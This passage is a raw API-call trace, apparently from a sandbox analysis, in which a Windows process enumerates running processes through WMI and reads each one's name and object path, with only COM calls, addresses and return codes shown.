0x2 [0224.683] WbemDefPath:IUnknown:Release (This=0x5e8a890) returned 0x1 [0224.683] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.683] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.683] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a890, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a890) returned 0x0 [0224.683] WbemDefPath:IUnknown:AddRef (This=0x5e8a890) returned 0x3 [0224.683] WbemDefPath:IUnknown:Release (This=0x5e8a890) returned 0x2 [0224.683] WbemDefPath:IWbemPath:SetText (This=0x5e8a890, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2448\"") returned 0x0 [0224.683] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.683] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.683] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.683] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.683] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.683] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.683] IWbemClassObject:Get (in: This=0x742708, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e77c0*=0, plFlavor=0x26e77c4*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="unittype.exe", varVal2=0x0), pType=0x26e77c0*=8, plFlavor=0x26e77c4*=0) returned 0x0 [0224.683] SysStringByteLen (bstr="unittype.exe") returned 0x18 [0224.683] SysStringByteLen (bstr="unittype.exe") returned 0x18 [0224.683] IWbemClassObject:Get (in: This=0x742708, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e77c0*=8, plFlavor=0x26e77c4*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="unittype.exe", varVal2=0x0), pType=0x26e77c0*=8, plFlavor=0x26e77c4*=0) returned 0x0 [0224.684] SysStringByteLen (bstr="unittype.exe") returned 0x18 [0224.684] SysStringByteLen (bstr="unittype.exe") returned 0x18 [0224.684] CoTaskMemAlloc (cb=0x4) returned 0x5e8ce28 [0224.684] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8ce28, puReturned=0x26dde18 | out: apObjects=0x5e8ce28*=0x7428a0, puReturned=0x26dde18*=0x1) returned 0x0 [0224.685] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x7428a0) returned 0x0 [0224.685] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.685] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.685] IUnknown:AddRef (This=0x7428a0) returned 0x3 [0224.685] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.685] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.685] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x7428a4) returned 0x0 [0224.685] IMarshal:GetUnmarshalClass (in: This=0x7428a4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.685] IUnknown:Release (This=0x7428a4) returned 0x3 [0224.685] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.685] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.685] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.685] IUnknown:Release (This=0x7428a0) returned 0x2 [0224.685] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.686] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.686] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x7428a0) returned 0x0 [0224.686] IUnknown:AddRef (This=0x7428a0) returned 0x4 [0224.686] IUnknown:Release (This=0x7428a0) returned 0x3 [0224.686] IUnknown:Release (This=0x7428a0) returned 0x2 [0224.686] CoTaskMemFree (pv=0x5e8ce28) [0224.686] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.686] IUnknown:AddRef (This=0x7428a0) returned 0x3 [0224.686] IWbemClassObject:Get (in: This=0x7428a0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.686] IWbemClassObject:Get (in: This=0x7428a0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.686] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"") returned 0x66 [0224.686] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"") returned 0x66 [0224.686] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.687] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.687] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.687] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.687] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8ce28) returned 0x0 [0224.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ce28, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.688] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8ce28, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a970) returned 0x0 [0224.688] WbemDefPath:IUnknown:Release (This=0x5e8ce28) returned 0x0 [0224.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a970, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a970) returned 0x0 [0224.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a970, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.688] WbemDefPath:IUnknown:AddRef (This=0x5e8a970) returned 0x3 [0224.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a970, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a970, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a970, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8ce38) returned 0x0 [0224.688] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8ce38, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.688] WbemDefPath:IUnknown:Release (This=0x5e8ce38) returned 0x3 [0224.688] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.688] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a970, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.689] WbemDefPath:IUnknown:Release (This=0x5e8a970) returned 0x2 [0224.689] WbemDefPath:IUnknown:Release (This=0x5e8a970) returned 0x1 [0224.689] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.689] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.689] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a970, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a970) returned 0x0 [0224.689] WbemDefPath:IUnknown:AddRef (This=0x5e8a970) returned 0x3 [0224.689] WbemDefPath:IUnknown:Release (This=0x5e8a970) returned 0x2 [0224.689] WbemDefPath:IWbemPath:SetText (This=0x5e8a970, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"") returned 0x0 [0224.689] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.689] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.689] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.689] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.689] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.689] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.689] IWbemClassObject:Get (in: This=0x7428a0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e8034*=0, plFlavor=0x26e8038*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="allow.exe", varVal2=0x0), pType=0x26e8034*=8, plFlavor=0x26e8038*=0) returned 0x0 [0224.689] SysStringByteLen (bstr="allow.exe") returned 0x12 [0224.689] SysStringByteLen (bstr="allow.exe") returned 0x12 [0224.689] IWbemClassObject:Get (in: This=0x7428a0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e8034*=8, plFlavor=0x26e8038*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="allow.exe", varVal2=0x0), pType=0x26e8034*=8, plFlavor=0x26e8038*=0) returned 0x0 [0224.689] SysStringByteLen (bstr="allow.exe") returned 0x12 [0224.689] SysStringByteLen (bstr="allow.exe") returned 0x12 [0224.689] CoTaskMemAlloc (cb=0x4) returned 0x5e8ce68 [0224.689] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8ce68, puReturned=0x26dde18 | out: apObjects=0x5e8ce68*=0x742a38, puReturned=0x26dde18*=0x1) returned 0x0 [0224.690] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x742a38) returned 0x0 [0224.690] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.690] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.691] IUnknown:AddRef (This=0x742a38) returned 0x3 [0224.691] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.691] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.691] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x742a3c) returned 0x0 [0224.691] IMarshal:GetUnmarshalClass (in: This=0x742a3c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.691] IUnknown:Release (This=0x742a3c) returned 0x3 [0224.691] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.691] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.691] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.691] IUnknown:Release (This=0x742a38) returned 0x2 [0224.691] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.691] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.691] IUnknown:QueryInterface (in: This=0x742a38, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x742a38) returned 0x0 [0224.691] IUnknown:AddRef (This=0x742a38) returned 0x4 [0224.691] IUnknown:Release (This=0x742a38) returned 0x3 [0224.691] IUnknown:Release (This=0x742a38) returned 0x2 [0224.691] CoTaskMemFree (pv=0x5e8ce68) [0224.692] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.692] IUnknown:AddRef (This=0x742a38) returned 0x3 [0224.692] IWbemClassObject:Get (in: This=0x742a38, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.692] IWbemClassObject:Get (in: This=0x742a38, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2464\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.692] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2464\"") returned 0x66 [0224.692] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2464\"") returned 0x66 [0224.692] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.692] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.692] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.692] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.693] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8ce68) returned 0x0 [0224.693] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8ce68, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.693] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8ce68, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8aa50) returned 0x0 [0224.694] WbemDefPath:IUnknown:Release (This=0x5e8ce68) returned 0x0 [0224.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8aa50, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8aa50) returned 0x0 [0224.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8aa50, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.694] WbemDefPath:IUnknown:AddRef (This=0x5e8aa50) returned 0x3 [0224.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8aa50, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8aa50, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8aa50, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8ce78) returned 0x0 [0224.694] WbemDefPath:IMarshal:GetUnmarshalClass (in: 